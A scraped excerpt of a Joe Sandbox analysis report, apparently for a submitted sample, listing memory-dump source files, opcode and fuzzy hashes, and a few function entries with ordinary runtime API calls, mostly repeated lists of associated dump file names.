Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31c5c4eb44257172df27878a59d3042399a053687db9d95564960f482188d13c
Instruction ID: 3bec47d9d99a72b3b3e5f5b408502327c26911308304f44ea93fe48d921436fc
Opcode Fuzzy Hash: 31c5c4eb44257172df27878a59d3042399a053687db9d95564960f482188d13c
Instruction Fuzzy Hash: 4021B673F2043947770CC47E8C562BDB6E1C78C541745423AF8A6EA2C1D968D917E2E4

Function 00A1779B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62900675aff7f81eedd847470e20752aaed601faeb1b431fa0b3038ea0135e3f
Instruction ID: 1f8fbdeb64c1c77b34d6368808ba51386c151dc97144dd4b07066eaea5703dc4
Opcode Fuzzy Hash: 62900675aff7f81eedd847470e20752aaed601faeb1b431fa0b3038ea0135e3f
Instruction Fuzzy Hash: 62117723F30C255B675C816D8C172BE95D2DBD825075F533AD826E7284E994DE13D290

Function 00A18860 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 8cd1a042c4113b639530127266327162483e20a43b442a81602478a16aeed5d8
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: BA113D7760018243E6148B3DC9F45F7E795EBC53617AC437AD0424F758DE2AD9C59600

Function 00A0A302 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 7990114625ea434e598ba75ec872e28a4bfd44d53151be56f9c5776a23487246
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: B8E08C3292122CEBCB14DB98EA0498AF3ECEB49B00B650096F512D3190C270DE00CBD1

Function 009D2EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 009D2F5F
GetCurrentThreadId.KERNEL32 ref: 009D2F7E
__Mtx_unlock.LIBCPMT ref: 009D2FCC
__Cnd_broadcast.LIBCPMT ref: 009D2FE3
__Mtx_unlock.LIBCPMT ref: 009D30F5
GetCurrentThreadId.KERNEL32 ref: 009D3132
__Mtx_unlock.LIBCPMT ref: 009D319B

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: aaeb2ecd1f3921bdbf725b527bb4b50f020e603a35153608321ad392b7f4f219
Instruction ID: 8e8858656a8179b95cccdfcac2b5239f84e7007bf66fe60e426a883a20da9d65
Opcode Fuzzy Hash: aaeb2ecd1f3921bdbf725b527bb4b50f020e603a35153608321ad392b7f4f219
Instruction Fuzzy Hash: 5AA11FB0A45246AFDB21DFA5C84479AB7B8FF55311F00C62AE815D7381EB31EA05CBD2

Function 00A0CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00A0CC66

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
